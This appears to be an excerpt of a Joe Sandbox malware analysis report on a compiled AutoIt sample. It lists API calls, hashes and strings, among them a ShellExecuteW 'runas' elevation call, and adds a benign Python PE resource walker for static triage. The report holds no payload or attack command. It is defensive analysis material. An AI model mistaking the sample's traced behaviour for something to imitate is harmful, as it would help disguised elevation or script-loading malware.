                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                        • String ID: SCRIPT
                        • API String ID: 3051347437-3967369404
                        • Opcode ID: 66416d8bd0581f03bdee432686227283083aff62fb32698c9a84c54625863c25
                        • Instruction ID: 3ef04f97af142eeb93259d9b2add555444f35f51f00ca5425217e8decba28034
                        • Opcode Fuzzy Hash: 66416d8bd0581f03bdee432686227283083aff62fb32698c9a84c54625863c25
                        • Instruction Fuzzy Hash: FF115A70200700AFDB228BA6DC88F677BBDEBC6B51F158969F416D6650DB71EC008B20
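The function above is the AutoIt runtime locating its embedded script: FindResourceExW is called with type 0000000A (RT_RCDATA) and the name "SCRIPT", the handle goes through LoadResource, SizeofResource and LockResource, and CreateStreamOnHGlobal wraps the bytes for the interpreter. The same entry can be found statically, which is the quickest way to confirm the "compiled AutoIt script" verdict on a triage box without running the sample. The walker below is an added example written for this page, not code from the sample or from the Joe Sandbox report; it uses only the Python standard library, and build_sample_pe() assembles a constructed minimal PE32 image inline so the check runs offline (for a real file you would pass the bytes of the executable instead).

```python
"""Static check for the RT_RCDATA/"SCRIPT" resource a compiled AutoIt binary
loads at runtime via FindResourceExW(hModule, RT_RCDATA, L"SCRIPT", ...).

Added triage example; not code from the sample or from the report.
Standard library only. build_sample_pe() returns a constructed, minimal
PE32 image so the resource walker can be exercised offline."""
import struct

RT_RCDATA = 10           # the 0000000A type argument seen in the FindResourceExW call
HIGH_BIT = 0x80000000    # on entry.Name: name is a string; on entry.OffsetToData: subdirectory
LOW_MASK = 0x7FFFFFFF


def _rva_to_off(sections, rva):
    """Map an RVA to a file offset through the section table."""
    for va, vsize, raw_ptr, raw_size in sections:
        if va <= rva < va + max(vsize, raw_size):
            return rva - va + raw_ptr
    raise ValueError("RVA 0x%x is not backed by any section" % rva)


def _read_name(rsrc, off):
    """IMAGE_RESOURCE_DIR_STRING_U: u16 character count, then UTF-16LE text."""
    count = struct.unpack_from("<H", rsrc, off)[0]
    return rsrc[off + 2:off + 2 + 2 * count].decode("utf-16-le")


def _entries(rsrc, dir_off):
    """Yield (name_or_id, target_offset, is_subdir) for one IMAGE_RESOURCE_DIRECTORY."""
    named, by_id = struct.unpack_from("<HH", rsrc, dir_off + 12)
    for i in range(named + by_id):
        name, target = struct.unpack_from("<II", rsrc, dir_off + 16 + 8 * i)
        key = _read_name(rsrc, name & LOW_MASK) if name & HIGH_BIT else name
        yield key, target & LOW_MASK, bool(target & HIGH_BIT)


def find_script_resource(pe, name="SCRIPT"):
    """Return the bytes of the RT_RCDATA resource called `name`, or None if absent."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsec = struct.unpack_from("<H", pe, e_lfanew + 6)[0]        # IMAGE_FILE_HEADER.NumberOfSections
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]   # IMAGE_FILE_HEADER.SizeOfOptionalHeader
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", pe, opt)[0]
    # data directory index 2 = resources; the table starts at +96 (PE32) or +112 (PE32+)
    dd = opt + (96 if magic == 0x10B else 112) + 2 * 8
    rsrc_rva = struct.unpack_from("<I", pe, dd)[0]
    if rsrc_rva == 0:
        return None
    sections = []
    for i in range(nsec):
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", pe, opt + opt_size + 40 * i + 8)
        sections.append((va, vsize, raw_ptr, raw_size))
    rsrc = pe[_rva_to_off(sections, rsrc_rva):]   # directory offsets are relative to .rsrc
    for rtype, type_dir, is_dir in _entries(rsrc, 0):                 # level 1: type
        if rtype != RT_RCDATA or not is_dir:
            continue
        for rname, name_dir, is_dir2 in _entries(rsrc, type_dir):     # level 2: name/id
            if rname != name or not is_dir2:
                continue
            for _lang, leaf, is_dir3 in _entries(rsrc, name_dir):     # level 3: language
                if is_dir3:
                    continue
                data_rva, size = struct.unpack_from("<II", rsrc, leaf)  # IMAGE_RESOURCE_DATA_ENTRY
                start = _rva_to_off(sections, data_rva)
                return bytes(pe[start:start + size])
    return None


def build_sample_pe(script=b"#constructed AutoIt script payload#", name="SCRIPT"):
    """Constructed minimal PE32 whose only resource is RT_RCDATA/<name>, language 0x409."""
    RVA, RAW = 0x1000, 0x200
    name_u16 = name.encode("utf-16-le")
    name_off = 88                                    # three dir+entry pairs (72) plus the leaf (16)
    data_off = (name_off + 2 + len(name_u16) + 3) & ~3

    def directory(named, by_id):
        return struct.pack("<IIHHHH", 0, 0, 0, 0, named, by_id)

    def entry(key, target):
        return struct.pack("<II", key, target)

    rsrc = bytearray()
    rsrc += directory(0, 1) + entry(RT_RCDATA, HIGH_BIT | 24)             # root -> type subdir at 24
    rsrc += directory(1, 0) + entry(HIGH_BIT | name_off, HIGH_BIT | 48)   # type -> name subdir at 48
    rsrc += directory(0, 1) + entry(0x409, 72)                            # name -> leaf at 72
    rsrc += struct.pack("<IIII", RVA + data_off, len(script), 0, 0)       # data entry: RVA, size
    rsrc += struct.pack("<H", len(name)) + name_u16                       # the name string
    rsrc += b"\0" * (data_off - len(rsrc)) + script
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                               # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                                 # PE32 magic
    struct.pack_into("<II", opt, 96 + 2 * 8, RVA, len(rsrc))              # resource data directory
    sec = struct.pack("<8sIIIIIIHHI", b".rsrc", len(rsrc), RVA, len(rsrc), RAW, 0, 0, 0, 0, 0x40000040)
    hdr = dos + b"PE\0\0" + coff + opt + sec
    return bytes(hdr + b"\0" * (RAW - len(hdr)) + rsrc)


if __name__ == "__main__":
    blob = find_script_resource(build_sample_pe())
    print("RT_RCDATA/SCRIPT present, %d bytes" % len(blob) if blob else "no SCRIPT resource")
```

Two caveats for use on real samples. First, the body of the resource in a compiled AutoIt executable is not the plaintext script (the compiler stores it in a compressed and obfuscated form), so this check establishes that the script is embedded and how large it is; recovering the source needs a dedicated AutoIt decompiler. Second, the walker only follows the path type 10 / "SCRIPT" / first language; a packer that moves the script elsewhere, or a non-AutoIt binary that happens to carry an RCDATA entry with that name, will defeat or trigger it respectively, so treat a hit as corroboration of the API chain above rather than as proof on its own.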

                        Control-flow Graph

                        APIs
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00332B6B
                          • Part of subcall function 00333A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00401418,?,00332E7F,?,?,?,00000000), ref: 00333A78
                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                        • GetForegroundWindow.USER32(runas,?,?,?,?,?,003F2224), ref: 00372C10
                        • ShellExecuteW.SHELL32(00000000,?,?,003F2224), ref: 00372C17
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                        • String ID: runas
                        • API String ID: 448630720-4000483414
                        • Opcode ID: 306ce0a178b8bfad8bbdc37a215a00fd35a7f666442059b4ec7009bb8e7bdd6e
                        • Instruction ID: a3c28b5b15a01c791280222b21edfa5fd349a1956df03e86cc24d857c66d3143
                        • Opcode Fuzzy Hash: 306ce0a178b8bfad8bbdc37a215a00fd35a7f666442059b4ec7009bb8e7bdd6e
                        • Instruction Fuzzy Hash: 50118131208345AAC717FF60D8D2ABFB7A89B91351F44942DF1865B0B2CF759A49C712
                        APIs
                        • lstrlenW.KERNEL32(?,00375222), ref: 0039DBCE
                        • GetFileAttributesW.KERNELBASE(?), ref: 0039DBDD
                        • FindFirstFileW.KERNELBASE(?,?), ref: 0039DBEE
                        • FindClose.KERNEL32(00000000), ref: 0039DBFA
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: FileFind$AttributesCloseFirstlstrlen
                        • String ID:
                        • API String ID: 2695905019-0
                        • Opcode ID: 38ae7f8485859a12ff871625180a61c1c8502668702c6c87eccabd0f816d2e6a
                        • Instruction ID: 5b66ef17c9aa3a1d7ebeb23661e918b28b261a40e82eddf5222d95b36d712c03
                        • Opcode Fuzzy Hash: 38ae7f8485859a12ff871625180a61c1c8502668702c6c87eccabd0f816d2e6a
                        • Instruction Fuzzy Hash: 9BF0A03082091057CA226B78EC0E8AA776C9E01334F144B02F83AC20E0EBB069558A95
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: BuffCharUpper
                        • String ID: p#@
                        • API String ID: 3964851224-1673889715
                        • Opcode ID: 43f1f6b2d09712b7ff1838f11bb49185985fe9d336ea054fb6624606396f8fe3
                        • Instruction ID: 1fafbfc7ce4f8d816448757dc00fd0adf153c54e1969fb25d0886eae310f89fb
                        • Opcode Fuzzy Hash: 43f1f6b2d09712b7ff1838f11bb49185985fe9d336ea054fb6624606396f8fe3
                        • Instruction Fuzzy Hash: 54A279706083418FC756DF28C4C0B2ABBE5BF89304F15996DE89A9B352D771EC45CB92
                        APIs
                        • GetInputState.USER32 ref: 0033D807
                        • timeGetTime.WINMM ref: 0033DA07
                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0033DB28
                        • TranslateMessage.USER32(?), ref: 0033DB7B
                        • DispatchMessageW.USER32(?), ref: 0033DB89
                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0033DB9F
                        • Sleep.KERNEL32(0000000A), ref: 0033DBB1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                        • String ID:
                        • API String ID: 2189390790-0
                        • Opcode ID: bb7561570c5421535305e45f42290f16dca6c6cbc0152e0b7e5c0fa3115041b6
                        • Instruction ID: 79df7216a669ff6a6eb20735f1b3d2cec8a6e5b36a757ccad92f430fbb3ecb02
                        • Opcode Fuzzy Hash: bb7561570c5421535305e45f42290f16dca6c6cbc0152e0b7e5c0fa3115041b6
                        • Instruction Fuzzy Hash: D942D070608341EFD72BDF24D884FAAB7E5BF86304F1585A9F4568B2A1D770E844CB92

                        Control-flow Graph

                        APIs
                        • GetSysColorBrush.USER32(0000000F), ref: 00332D07
                        • RegisterClassExW.USER32(00000030), ref: 00332D31
                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00332D42
                        • InitCommonControlsEx.COMCTL32(?), ref: 00332D5F
                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00332D6F
                        • LoadIconW.USER32(000000A9), ref: 00332D85
                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00332D94
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                        • API String ID: 2914291525-1005189915
                        • Opcode ID: 9b1c91bce20f481df113200419c43a87cae09849ee436dd80feb8d800f655328
                        • Instruction ID: abee9cb7ef13f2bde5fce441c5f821bba2b0dc48bf862b4628ddfd8a34d079ad
                        • Opcode Fuzzy Hash: 9b1c91bce20f481df113200419c43a87cae09849ee436dd80feb8d800f655328
                        • Instruction Fuzzy Hash: EA21A0B5911218AFDB019FA4E949B9DBBB8FB08700F00512AEA15F62A0D7B15544CF95

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID: .5
                        • API String ID: 0-4279605997
                        • Opcode ID: 6e74fb9ef035ad728cab610ef64f8ca428c56f403ef154eba81718253c84b15a
                        • Instruction ID: d5c903947fd9e1a93b36358c201cc5ba80de059ce4d2226aa7d400276af59efd
                        • Opcode Fuzzy Hash: 6e74fb9ef035ad728cab610ef64f8ca428c56f403ef154eba81718253c84b15a
                        • Instruction Fuzzy Hash: A3C1F674D04249AFCF13DFA8D841BADBBB8AF0D310F05815AF815AB396CB719941CB61

                        Control-flow Graph

                        APIs
                          • Part of subcall function 0037039A: CreateFileW.KERNELBASE(00000000,00000000,?,00370704,?,?,00000000,?,00370704,00000000,0000000C), ref: 003703B7
                        • GetLastError.KERNEL32 ref: 0037076F
                        • __dosmaperr.LIBCMT ref: 00370776
                        • GetFileType.KERNELBASE(00000000), ref: 00370782
                        • GetLastError.KERNEL32 ref: 0037078C
                        • __dosmaperr.LIBCMT ref: 00370795
                        • CloseHandle.KERNEL32(00000000), ref: 003707B5
                        • CloseHandle.KERNEL32(?), ref: 003708FF
                        • GetLastError.KERNEL32 ref: 00370931
                        • __dosmaperr.LIBCMT ref: 00370938
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                        • String ID: H
                        • API String ID: 4237864984-2852464175
                        • Opcode ID: 5fb936d258de9a6b3f5542c0cca5b1fd16188ee310c7dd3c48718334ec422252
                        • Instruction ID: 8d460e997890fe5fb00a014edb5e071f0603a0f68850b1f0421615b5a415ce36
                        • Opcode Fuzzy Hash: 5fb936d258de9a6b3f5542c0cca5b1fd16188ee310c7dd3c48718334ec422252
                        • Instruction Fuzzy Hash: 8DA12836A101448FDF2E9F68D851BAD7BA0EB06320F14815DF859EF2A1CB399812CB91

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00333A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00401418,?,00332E7F,?,?,?,00000000), ref: 00333A78
                          • Part of subcall function 00333357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00333379
                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0033356A
                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0037318D
                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 003731CE
                        • RegCloseKey.ADVAPI32(?), ref: 00373210
                        • _wcslen.LIBCMT ref: 00373277
                        • _wcslen.LIBCMT ref: 00373286
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                        • API String ID: 98802146-2727554177
                        • Opcode ID: b448091ac89118901e06cc4a0f58b102801b555fa50f705abf7eaaf5aba5e0e3
                        • Instruction ID: bad5da69b8f479994890d527d9a5898e3148165fe41895205e224268a54c6774
                        • Opcode Fuzzy Hash: b448091ac89118901e06cc4a0f58b102801b555fa50f705abf7eaaf5aba5e0e3
                        • Instruction Fuzzy Hash: DF7191714043009EC316EF65DE8599BB7E8FF85340F40583EF949EB1A1DBB49A48CB55

                        Control-flow Graph

                        APIs
                        • GetSysColorBrush.USER32(0000000F), ref: 00332B8E
                        • LoadCursorW.USER32(00000000,00007F00), ref: 00332B9D
                        • LoadIconW.USER32(00000063), ref: 00332BB3
                        • LoadIconW.USER32(000000A4), ref: 00332BC5
                        • LoadIconW.USER32(000000A2), ref: 00332BD7
                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00332BEF
                        • RegisterClassExW.USER32(?), ref: 00332C40
                          • Part of subcall function 00332CD4: GetSysColorBrush.USER32(0000000F), ref: 00332D07
                          • Part of subcall function 00332CD4: RegisterClassExW.USER32(00000030), ref: 00332D31
                          • Part of subcall function 00332CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00332D42
                          • Part of subcall function 00332CD4: InitCommonControlsEx.COMCTL32(?), ref: 00332D5F
                          • Part of subcall function 00332CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00332D6F
                          • Part of subcall function 00332CD4: LoadIconW.USER32(000000A9), ref: 00332D85
                          • Part of subcall function 00332CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00332D94
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                        • String ID: #$0$AutoIt v3
                        • API String ID: 423443420-4155596026
                        • Opcode ID: 8b8d22b40dbfe2a97e003a17c687f075f1123f33b039a7f10c735cf3c5cea658
                        • Instruction ID: 05f6c6458baa9414931b0625720bfe8fe44a216d83bb908bfe56fb9465286d96
                        • Opcode Fuzzy Hash: 8b8d22b40dbfe2a97e003a17c687f075f1123f33b039a7f10c735cf3c5cea658
                        • Instruction Fuzzy Hash: A9213974E10314AFEB119FA5EE85AA97FF8FB08B50F04002AF905B66B0D3B11540CF98
                        APIs
                        • __Init_thread_footer.LIBCMT ref: 0033BB4E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Init_thread_footer
                        • String ID: p#@$p#@$p#@$p#@$p%@$p%@$x#@$x#@
                        • API String ID: 1385522511-2640102361
                        • Opcode ID: 12eb64d87068e3388ec3a7a631d8dc52da5163f8a2814e66757fc3deecb85c8b
                        • Instruction ID: 30e1b6f4eced2aa9129bafaf2233c692c5d58276f8f57802418a457c671f0369
                        • Opcode Fuzzy Hash: 12eb64d87068e3388ec3a7a631d8dc52da5163f8a2814e66757fc3deecb85c8b
                        • Instruction Fuzzy Hash: 6132EF34A00209DFCB26DF64C9C8BBEB7B9EF44310F158099EE15AB291C7B4AD45CB50

                        Control-flow Graph

                        APIs
                        • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0033316A,?,?), ref: 003331D8
                        • KillTimer.USER32(?,00000001,?,?,?,?,?,0033316A,?,?), ref: 00333204
                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00333227
                        • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0033316A,?,?), ref: 00333232
                        • CreatePopupMenu.USER32 ref: 00333246
                        • PostQuitMessage.USER32(00000000), ref: 00333267
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                        • String ID: TaskbarCreated
                        • API String ID: 129472671-2362178303
                        • Opcode ID: cbd4e07ec7b806d5a5acce998a7909713484a3fd9f33ab6ebdfa6289a0172597
                        • Instruction ID: 084f7b5e9ee499d318918bc307d2bd6096fa448185630a604c94b4f376a00c80
                        • Opcode Fuzzy Hash: cbd4e07ec7b806d5a5acce998a7909713484a3fd9f33ab6ebdfa6289a0172597
                        • Instruction Fuzzy Hash: 04412831A50200ABEB272B78DE8DB7A365DE705340F04C135F91AEA5F1C779DA40D769
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID: D%@$D%@$D%@$D%@$D%@D%@$Variable must be of type 'Object'.
                        • API String ID: 0-3139565913
                        • Opcode ID: 3ee2721948c6c3443d8ee7cb663ec58b5786592f97101ca259e2597af18e5bdd
                        • Instruction ID: d7593252870f1e30f37c82007b4067dae0ad03437d1baf57de36024143c12fb1
                        • Opcode Fuzzy Hash: 3ee2721948c6c3443d8ee7cb663ec58b5786592f97101ca259e2597af18e5bdd
                        • Instruction Fuzzy Hash: C0C29875E00214CFCB26DFA8C8C0AADB7B1BF09710F258569E946AB3A1D375ED41CB91

                        Control-flow Graph

                        APIs
                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 013826A1
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 013828C7
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189780107.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1380000_Copy of 01.jbxd
                        Similarity
                        • API ID: CreateFileFreeVirtual
                        • String ID:
                        • API String ID: 204039940-0
                        • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                        • Instruction ID: b4f93f80d1080d7e7d6ec5032bfd810d6c3ac6fdc3003aa23a79ae37666bf045
                        • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                        • Instruction Fuzzy Hash: 24A11874E00209EBDF14EFA8C894BEEBBB5BF48308F208159E511BB281D7759A80CB55

                        Control-flow Graph

                        APIs
                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00332C91
                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00332CB2
                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,00331CAD,?), ref: 00332CC6
                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,00331CAD,?), ref: 00332CCF
                        Strings
                        Memory Dump Source
